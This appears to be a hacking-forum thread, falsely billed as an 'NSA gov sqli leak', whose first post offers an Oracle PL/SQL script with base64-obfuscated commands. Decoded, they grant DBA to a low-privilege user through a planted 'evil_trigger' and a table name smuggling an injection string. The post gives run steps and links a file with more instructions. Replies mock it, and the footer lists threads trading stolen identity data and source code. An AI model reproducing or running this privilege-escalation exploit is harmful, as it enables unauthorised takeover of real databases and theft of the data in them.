Possibly Related Threads…

un3xpectedbandit · (This post was last modified: 08-07-2024, 08:18 PM by un3xpectedbandit.)

NSA gov sqli leak

let me give a brief explanation of what this is
the following strings in the script are in Base64 format. When decoded they translate to sql commands to create and execute DATABASE procedures.

There is steps were you can create a stored procedure D that grants the DBA
steps: you need to connect to an Oracle Database using appropriate client to connect the database and execute the script.
here is the encoded base64 strings leak:
provided to you by h3x0rb
DECLARE

JR VARCHAR2(32767);
P VARCHAR2(32767);
LWWQE VARCHAR2(32767);
OWDG VARCHAR2(32767);
DDHSZAS VARCHAR2(32767);
BEGIN
JR := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('CiAgICAgIENSRUFURSBPUiBSRVBMQUNFIFBST0NFRFVSRSBECiAgICAgIEFVVEhJRCBDVVJSRU5UX1VTRVIgQVMKICAgICAgUFJBR01BIEFVVE9OT01PVVNfVFJBTlNBQ1RJT047CiAgICAgIEJFR0lOIEVYRUNVVEUgSU1NRURJQVRFICdHUkFOVCBEQkEgVE8gU0NPVFQnOwogICAgICBFTkQ7CiAgICAgIA==')));
EXECUTE IMMEDIATE JR;
EXECUTE IMMEDIATE 'GRANT EXECUTE ON D TO PUBLIC';
P := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('CiAgICAgIENSRUFURSBPUiBSRVBMQUNFIEZVTkNUSU9OIERHRlJMIFJFVFVSTiBudW1iZXIgQVVUSElEIENVUlJFTlRfVVNFUiBpcwogICAgICBQUkFHTUEgQVVUT05PTU9VU19UUkFOU0FDVElPTjsKICAgICAgU1RNVCBWQVJDSEFSMig0MDApOj0gJ2NyZWF0ZSBvciByZXBsYWNlIHRyaWdnZXIgc3lzdGVtLmV2aWxfdHJpZ2dlciBiZWZvcmUgaW5zZXJ0IG9uIHN5c3RlbS5ERUYkX1RFTVAkTE9CIERFQ0xBUkUgbXNnIFZBUkNIQVIyKDEwKTsKICAgICAgQkVHSU4gU0NPVFQuRDsKICAgICAgZW5kIGV2aWxfdHJpZ2dlcjsnOwogICAgICBCRUdJTgogICAgICBFWEVDVVRFIElNTUVESUFURSBTVE1UOwogICAgICBDT01NSVQ7CiAgICAgIFJFVFVSTiAxOwogICAgICBFTkQ7CiAgICAgIA==')));
EXECUTE IMMEDIATE P;
EXECUTE IMMEDIATE 'GRANT EXECUTE ON DGFRL TO PUBLIC';
LWWQE := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('Y3JlYXRlIHRhYmxlICJPJyBhbmQgMT1TQ09UVC5ER0ZSTC0tIihpZCBudW1iZXIp')));
EXECUTE IMMEDIATE LWWQE;
OWDG := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('ZHJvcCB0YWJsZSAiTycgYW5kIDE9U0NPVFQuREdGUkwtLSI=')));
EXECUTE IMMEDIATE OWDG;
DDHSZAS := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('aW5zZXJ0IGludG8gc3lzdGVtLkRFRiRfVEVNUCRMT0IgKFRFTVAkQkxPQikgVkFMVUVTICgnQUEnKQ==')));
EXECUTE IMMEDIATE DDHSZAS;
END;
/
DROP FUNCTION D;
DROP FUNCTION DGFRL;

here is the file and also the decoded strings and also more instructions:

https://pixeldrain.com/u/KPsSbdFv

TELE: govbandit
TEAM: hexorb
--------------------
infosec
bugbounty
blackhat

m1nut3m4n · 08-08-2024, 03:16 PM

how is this a leak when the last line of link say "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?

un3xpectedbandit · 08-08-2024, 03:33 PM

(08-08-2024, 03:16 PM)m1nut3m4n Wrote: how is this a leak when the last line of link say "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?

that is to connect to the database with you own oracle database once you decrypt the base64 you should be able to use that to get some more info in the database

grimoire · 08-08-2024, 11:11 PM

Another useless post thanks mr bandit

brainrot · 08-13-2024, 12:41 PM

why the hell do you spend your time posting this shit?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	DOCUMENTS DRDO leak by babuk locker 2.0	artemisappolo	9	1,515	03-28-2026, 06:43 PM Last Post: DDDDDDDS
	SOURCE CODE Multiple UAE Websites Source code leak	hexvior	11	98	03-28-2026, 05:40 PM Last Post: xzin0vich
	SOURCE CODE Thailand Kohme Delivery Full source code leak + Github PAT	hexvior	10	482	03-28-2026, 09:20 AM Last Post: minhchinhkd88
	[LEAK] French identity card generator	csgqegge	0	41	03-27-2026, 06:58 PM Last Post: csgqegge
	Usa 50 State Database Leak + Physıcal Id / Ssn / Selfıe / Bank Statement	nosec1is2strong	98	32,646	03-27-2026, 04:28 PM Last Post: OriginalCrazyOldFart